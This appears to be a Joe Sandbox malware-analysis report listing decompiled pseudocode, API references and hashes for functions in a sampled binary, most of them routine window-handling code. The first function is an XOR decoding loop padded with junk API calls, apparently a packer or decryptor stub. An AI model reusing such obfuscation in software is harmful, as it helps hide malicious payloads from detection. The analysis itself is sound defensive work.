Uniqueness

Uniqueness Score: -1.00%

Function 00401163, Relevance: 7.6, APIs: 6, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401163(intOrPtr _a4, intOrPtr _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				char _t49;
				intOrPtr _t58;
				intOrPtr _t90;
				intOrPtr _t107;
				void* _t115;

				_v8 =  *_a12;
				_v12 =  *((intOrPtr*)(_a12 + 1));
				_v16 = 0;
				while(_v16 < _a8) {
					asm("cdq");
					_v8 = ((_v8 & 0x000000ff) + 1) % 0x362;
					asm("cdq");
					_v12 = (0 + (_v12 & 0x000000ff)) % 0x362;
					_t58 =  *0x437cc0; // 0x2271c90
					_t107 =  *0x437cc0; // 0x2271c90
					E0040129C(_v8 & 0x000000ff, _t107 + (_v8 & 0x000000ff), _t58 + (_v12 & 0x000000ff));
					_t115 = _t115 + 8;
					asm("cdq");
					_v20 = 0;
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					_t90 =  *0x437cc0; // 0x2271c90
					 *(_a4 + _v16) =  *(_a4 + _v16) ^  *(_t90 + (_v20 & 0x000000ff));
					_v16 = _v16 + 1;
				}
				_t49 = _v8;
				 *_a12 = _t49;
				 *((char*)(_a12 + 1)) = _v12;
				return _t49;
			}

0x0040116f
0x00401178
0x0040117b
0x0040118d
0x004011a4
0x004011ac
0x004011cf
0x004011d7
0x004011e3
0x004011f4
0x004011fd
0x00401202
0x00401230
0x00401238
0x0040123b
0x00401241
0x00401247
0x0040124d
0x00401253
0x00401259
0x0040126e
0x0040127f
0x0040118a
0x0040118a
0x00401289
0x0040128c
0x00401294
0x0040129b

APIs

GetLastError.KERNEL32 ref: 0040123B
GetLastError.KERNEL32 ref: 00401241
GetLastError.KERNEL32 ref: 00401247
GetLastError.KERNEL32 ref: 0040124D
GetLastError.KERNEL32 ref: 00401253
GetLastError.KERNEL32 ref: 00401259

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
Instruction ID: 50b4629dd769d307c311c64c04c265a3d6c1846e1b25a8a03c552174e884fb50
Opcode Fuzzy Hash: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
Instruction Fuzzy Hash: 3031E535A0928A9FCB05CF58CC917BDBF72BF89300F1880F8D4519B352C535AA51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00415DE6, Relevance: 7.6, APIs: 5, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00415DE6(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;

				E00406520(E00429E94, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E00412F9D(_t64 - 0x38);
				E0041331F(_t64 - 0x74);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x58) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
						if(E00413767() == 0 || E00412DF9(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E00412DF9( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E00416528(_t64 - 0x74) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E00413162(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x58) = 0;
				_t31 = E00413DB2(_t64 - 0x74);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}

0x00415deb
0x00415dfa
0x00415dfd
0x00415e05
0x00415e0f
0x00415e18
0x00415e1c
0x00415e23
0x00415e24
0x00415e30
0x00415e36
0x00415e37
0x00415e41
0x00415e6d
0x00415e6f
0x00415e74
0x00415e89
0x00415eaa
0x00415eaa
0x00415e8b
0x00415e93
0x00415e99
0x00000000
0x00000000
0x00415e99
0x00415e89
0x00415eb3
0x00415eb3
0x00415e6d
0x00415ec1
0x00415ec3
0x00415ecb
0x00415ecc
0x00415ed3
0x00415ed6
0x00415ee0
0x00415ee8

APIs

__EH_prolog.LIBCMT ref: 00415DEB
GetTopWindow.USER32(?), ref: 00415E12
GetDlgCtrlID.USER32 ref: 00415E27
SendMessageA.USER32 ref: 00415E80
GetWindow.USER32(00000000,00000002), ref: 00415EBB

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
Instruction ID: a7ff307ea5fd4ed9b42493fc3e47649cc0ac06b73cf1fa4f536db176ac1b2ba5
Opcode Fuzzy Hash: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
Instruction Fuzzy Hash: 5331A272D00614EACB21EBA5DC859EFBB74EF95304F60022BF411E2295E7784E81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004105C2, Relevance: 7.6, APIs: 5, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004105C2(intOrPtr __ecx) {
				void* __esi;
				struct HWND__* _t40;
				void* _t42;
				void* _t50;
				intOrPtr _t63;
				signed int _t66;
				void* _t83;

				_t63 = __ecx;
				E00406520(E0042A8D0, _t83);
				_push(__ecx);
				_push(__ecx);
				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
					L9:
					E00416B16( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
				} else {
					_t40 =  *(__ecx + 0x1c);
					if(_t40 == 0) {
						goto L9;
					} else {
						_t66 =  *0x436980; // 0x436994
						 *(_t83 - 0x10) = _t66;
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						_t42 = E00413740(_t83, GetParent(_t40));
						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
							E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
						} else {
							E00416A77(_t83 - 0x10, 0x104);
						}
						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
							L8:
							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
							E00416AEC(_t83 - 0x10);
							_t63 =  *((intOrPtr*)(_t83 - 0x14));
							goto L9;
						} else {
							_t50 = E00413740(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
								E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
								E00416861( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
								E00416AEC(_t83 - 0x10);
							} else {
								E00416A77(_t83 - 0x10, 0x104);
								goto L8;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return  *((intOrPtr*)(_t83 + 8));
			}

0x004105c2
0x004105c7
0x004105cc
0x004105cd
0x004105ce
0x004105dc
0x004105df
0x0041068f
0x00410695
0x004105e5
0x004105e5
0x004105ea
0x00000000
0x004105f0
0x004105f0
0x004105f6
0x004105ff
0x00410607
0x00410630
0x00410641
0x00410632
0x00410635
0x00410635
0x0041064d
0x00410680
0x00410680
0x00410687
0x0041068c
0x00000000
0x0041064f
0x00410658
0x00410676
0x004106b3
0x004106bf
0x004106c4
0x004106cb
0x00410678
0x0041067b
0x00000000
0x0041067b
0x00410676
0x0041064d
0x004105ea
0x004106a3
0x004106ab

APIs

__EH_prolog.LIBCMT ref: 004105C7
GetParent.USER32(?), ref: 00410604
SendMessageA.USER32 ref: 0041062C
GetParent.USER32(?), ref: 00410655
SendMessageA.USER32 ref: 00410672

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageParentSend$H_prolog
String ID:
API String ID: 1056721960-0
Opcode ID: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
Instruction ID: 07ce01a875e9ee4c694f432b72042445b87f7b3637ebdeb0f8d3e1dd1834bd9a
Opcode Fuzzy Hash: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
Instruction Fuzzy Hash: 13318170600216ABCF14EFA1DC45AEFB774FF40358F11452AE421A71D1DB78D995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004150E7, Relevance: 7.6, APIs: 5, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004150E7(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t21;
				struct HWND__* _t22;
				struct HWND__* _t41;
				void* _t42;
				intOrPtr* _t43;

				_t42 = __ecx;
				_t21 = IsWindowVisible( *(__ecx + 0x1c));
				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t42 + 0x1c));
					while(1) {
						_t22 = GetWindow();
						_t41 = _t22;
						if(_t41 == 0) {
							goto L7;
						}
						GetWindowRect(_t41,  &_v20);
						E0041A2F1(_t42,  &_v20);
						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t41);
					}
				}
				L7:
				_t43 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t43 != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
				}
				return _t22;
			}

0x004150ef
0x004150f5
0x004150fd
0x00415166
0x00415109
0x0041510f
0x00415111
0x00415114
0x00415114
0x00415116
0x0041511a
0x00000000
0x00000000
0x00415121
0x0041512d
0x0041514c
0x00415152
0x00415154
0x00415154
0x00415114
0x0041516c
0x0041516c
0x00415171
0x00000000
0x00415183
0x0041518a

APIs

IsWindowVisible.USER32(?), ref: 004150F5
GetWindow.USER32(?,00000005), ref: 00415114
GetWindowRect.USER32 ref: 00415121

Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E

SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0041514C
ScrollWindow.USER32 ref: 00415166

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
Instruction ID: 05942f404d56e3bc249559bb1a558a0c6e37b23f98baaac5964d945a6837c05d
Opcode Fuzzy Hash: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
Instruction Fuzzy Hash: 03216A31A00609FFCF229F54DC48EFF7BB9EB88744B44452AF90596261D774AC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420B23, Relevance: 7.6, APIs: 5, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00420B23(intOrPtr* __ecx, void* __ebp, signed int _a4) {
				void* _t21;
				signed char _t22;
				signed int _t40;
				intOrPtr* _t44;
				void* _t45;
				struct HWND__* _t47;

				_t45 = __ebp;
				_t40 = _a4;
				_t44 = __ecx;
				if(_t40 != 0 && ( *(__ecx + 0x24) & 0x00000004) != 0) {
					E004166CE(__ecx, 0);
					return SetFocus(0);
				}
				_t21 = E00413740(_t45, GetParent( *(_t44 + 0x1c)));
				if(_t21 != 0) {
					return _t21;
				} else {
					if(_t40 != 0) {
						_t22 =  *(_t44 + 0x24);
						_push(_t45);
						if((_t22 & 0x00000080) != 0) {
							 *(_t44 + 0x24) = _t22 & 0x0000007f;
							 *((intOrPtr*)( *_t44 + 0x8c))();
							_t47 =  *(_t44 + 0x1c);
							if(GetActiveWindow() == _t47) {
								SendMessageA(_t47, 6, 1, 0);
							}
						}
						if(( *(_t44 + 0x24) & 0x00000020) != 0) {
							SendMessageA( *(_t44 + 0x1c), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t44 + 0xa0)) == 0) {
							 *(_t44 + 0x24) =  *(_t44 + 0x24) | 0x00000080;
							 *((intOrPtr*)( *_t44 + 0x88))();
						}
					}
					asm("sbb edi, edi");
					return E00420BD9(_t44, ( ~_t40 & 0xfffffff0) + 0x20);
				}
			}

0x00420b23
0x00420b26
0x00420b2c
0x00420b30
0x00420b39
0x00000000
0x00420b3f
0x00420b54
0x00420b5b
0x00420bd6
0x00420b5d
0x00420b5f
0x00420b79
0x00420b84
0x00420b85
0x00420b8b
0x00420b90
0x00420b96
0x00420ba1
0x00420baa
0x00420baa
0x00420ba1
0x00420bb1
0x00420bbf
0x00420bbf
0x00420b61
0x00420b67
0x00420b6b
0x00420b71
0x00420b71
0x00420b67
0x00420bc3
0x00000000
0x00420bce

APIs

SetFocus.USER32(00000000,00000000), ref: 00420B3F
GetParent.USER32(?), ref: 00420B4D
GetActiveWindow.USER32 ref: 00420B99
SendMessageA.USER32 ref: 00420BAA
SendMessageA.USER32 ref: 00420BBF

Part of subcall function 004166CE: EnableWindow.USER32(?,?), ref: 004166DC

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSendWindow$ActiveEnableFocusParent
String ID:
API String ID: 3951091596-0
Opcode ID: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
Instruction ID: b973cea33cd40a65d929727e5f9c9eb7024a6c5d1ea90242926d9fabef0d3f3f
Opcode Fuzzy Hash: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
Instruction Fuzzy Hash: E91106313003105FD7305FA4EC84B1BBBE9AF59B08F500A2EF596AA2D2CB74B841870C

Uniqueness

Uniqueness Score: -1.00%

Function 00420BD9, Relevance: 7.6, APIs: 5, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00420BD9(void* __ecx, signed int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t32;
				void* _t33;
				struct HWND__* _t34;

				_t33 = __ecx;
				if((E00416528(__ecx) & 0x40000000) == 0) {
					_t32 = E00414DCC(__ecx);
				} else {
					_t32 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E004166B3(_t32);
					if(( !_a4 & 0x00000008) == 0 || _t23 == 0 || _t32 == _t33) {
						SendMessageA( *(_t32 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t33 + 0x25) =  *(_t33 + 0x25) | 0x00000002;
						SendMessageA( *(_t32 + 0x1c), 0x86, 1, 0);
						 *(_t33 + 0x25) =  *(_t33 + 0x25) & 0x000000fd;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t34 = _t20;
					if(_t34 == 0) {
						break;
					}
					if(E004208E0( *(_t32 + 0x1c), _t34) != 0) {
						SendMessageA(_t34, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t34);
				}
				return _t20;
			}

0x00420bdd
0x00420be9
0x00420bf6
0x00420beb
0x00420beb
0x00420beb
0x00420c03
0x00420c07
0x00420c15
0x00420c43
0x00420c1f
0x00420c1f
0x00420c2f
0x00420c31
0x00420c31
0x00420c15
0x00420c45
0x00420c53
0x00420c54
0x00420c54
0x00420c56
0x00420c5a
0x00000000
0x00000000
0x00420c67
0x00420c75
0x00420c75
0x00420c77
0x00420c79
0x00420c79
0x00420c80

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

SendMessageA.USER32 ref: 00420C2F
SendMessageA.USER32 ref: 00420C43
GetDesktopWindow.USER32 ref: 00420C47
GetWindow.USER32(00000000), ref: 00420C54
SendMessageA.USER32 ref: 00420C75

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
Instruction ID: c41997b72d8c96214e5640ecb70f441624ebe3089d32e1eab02e12923e6e0a2e
Opcode Fuzzy Hash: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
Instruction Fuzzy Hash: AA113A3134072573E3355722AC06F2FBAC89F41B94F95432AB6402A2D3CF59DC42839D

Uniqueness

Uniqueness Score: -1.00%

Function 0042153C, Relevance: 7.6, APIs: 5, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042153C(intOrPtr __ecx, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				void* __ebp;
				int _t20;
				unsigned int _t39;
				intOrPtr _t45;

				_v8 = __ecx;
				_t45 =  *((intOrPtr*)(E00424BFB() + 4));
				if(_t45 != 0 && _a8 != 0) {
					_t39 = _a8 >> 0x10;
					if(_t39 != 0) {
						_t20 =  *(_t45 + 0xb0);
						if(_a8 == _t20 && _t39 ==  *(_t45 + 0xb2)) {
							GlobalGetAtomNameA(_t20,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA( *(_t45 + 0xb2),  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v8 + 0x1c), ( *(_t45 + 0xb2) & 0x0000ffff) << 0x00000010 |  *(_t45 + 0xb0) & 0x0000ffff);
						}
					}
				}
				return 0;
			}

0x00421546
0x0042154e
0x00421553
0x00421567
0x0042156d
0x00421573
0x0042157e
0x0042159e
0x004215ad
0x004215c3
0x004215cc
0x004215f0
0x004215f7
0x0042157e
0x0042156d
0x004215fc

APIs

GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 0042159E
GlobalAddAtomA.KERNEL32 ref: 004215AD
GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 004215C3
GlobalAddAtomA.KERNEL32 ref: 004215CC
SendMessageA.USER32 ref: 004215F0

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
Instruction ID: ddc056c18c8f30134593d029485027bb11089ec59ad006056310b0d46243fd91
Opcode Fuzzy Hash: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
Instruction Fuzzy Hash: EB119475600319AADB20EB68DC44AEBB3BCEB54700F404456E59697190E7B8EAC1CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004142C3, Relevance: 7.6, APIs: 5, Instructions: 52
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004142C3() {
				CHAR* _t35;
				WNDCLASSA* _t37;
				void* _t40;
				void* _t42;

				E00406520(E00429E28, _t40);
				_t37 =  *(_t40 + 8);
				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
					L5:
					_push(1);
					_pop(0);
					L6:
					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
					return 0;
				}
				if(RegisterClassA(_t37) != 0) {
					if( *((intOrPtr*)(E00424BFB() + 0x14)) != 0) {
						E00425F56(1);
						 *(_t40 - 4) = 0;
						_t9 = E00424BFB() + 0x34; // 0x34
						_t35 = _t9;
						lstrcatA(_t35, _t37->lpszClassName);
						 *(_t40 + 0xa) = 0xa;
						 *((char*)(_t40 + 0xb)) = 0;
						lstrcatA(_t35, _t40 + 0xa);
						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
						E00425FC6(1);
					}
					goto L5;
				}
				goto L6;
			}

0x004142c8
0x004142d2
0x004142d9
0x004142eb
0x00414340
0x00414340
0x00414342
0x00414343
0x00414348
0x00414351
0x00414351
0x004142f7
0x00414307
0x0041430b
0x00414310
0x00414321
0x00414321
0x00414325
0x0041432a
0x00414330
0x00414333
0x00414335
0x0041433b
0x0041433b
0x00000000
0x00414307
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004142C8
GetClassInfoA.USER32 ref: 004142E3
RegisterClassA.USER32 ref: 004142EE
lstrcatA.KERNEL32(00000034,?,00000001), ref: 00414325
lstrcatA.KERNEL32(00000034,?), ref: 00414333

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
Instruction ID: 1018f0675467b52ee35bd5ff78e2a168c77a44711dd41a513890d329257c2a90
Opcode Fuzzy Hash: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
Instruction Fuzzy Hash: D4112531B04218BECB10AFA5EC41BDE7FB8EF40304F00442BF816A3191C778E6418AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00427EF7, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00427EF7(void* __ecx, char _a8) {
				struct tagPOINT _v12;
				void* __ebp;
				void* _t15;
				void* _t24;
				void* _t26;
				intOrPtr* _t28;

				_push(__ecx);
				_push(__ecx);
				_t26 = __ecx;
				if(_a8 == 1) {
					GetCursorPos( &_v12);
					ScreenToClient( *(_t26 + 0x1c),  &_v12);
					if( *((intOrPtr*)(_t26 + 0xec)) == 2 || E0042799F(_t26, _t24,  &_v12,  &_a8) == 0) {
						_push(LoadCursorA(0, 0x7f00));
					} else {
						_t28 = _t26 + 0x100;
						if( *_t28 == 0) {
							 *_t28 = LoadCursorA( *(E00424BFB() + 0xc), 0x7902);
						}
						_push( *_t28);
					}
					SetCursor();
					_t15 = 0;
				} else {
					_t15 = E004136A7(__ecx);
				}
				return _t15;
			}

0x00427efa
0x00427efb
0x00427f01
0x00427f03
0x00427f10
0x00427f1d
0x00427f2a
0x00427f71
0x00427f3f
0x00427f3f
0x00427f48
0x00427f5e
0x00427f5e
0x00427f60
0x00427f60
0x00427f72
0x00427f78
0x00427f05
0x00427f05
0x00427f05
0x00427f7c

APIs

GetCursorPos.USER32(?), ref: 00427F10
ScreenToClient.USER32 ref: 00427F1D
LoadCursorA.USER32 ref: 00427F58
SetCursor.USER32(00000000), ref: 00427F72

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Cursor$ClientLoadScreen
String ID:
API String ID: 120721131-0
Opcode ID: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
Instruction ID: 6a5175c3ad254a8bfa5679941e9197540f95af319ead360478e78bd6a32066b2
Opcode Fuzzy Hash: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
Instruction Fuzzy Hash: EE019271718214EFDB209FA0DC49E9A77ACEF08315F81442BF94692250D778A981CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041031E, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041031E(void* _a4, void* _a8) {
				void* _v12;
				DEVMODEA* _t9;
				void* _t20;
				struct HDC__* _t22;
				signed short* _t23;

				if(_a4 == 0) {
					L5:
					return 0;
				}
				_t23 = GlobalLock(_a4);
				_t20 = _a8;
				if(_t20 == 0) {
					_t9 = 0;
				} else {
					_t9 = GlobalLock(_t20);
				}
				if(_t23 != 0) {
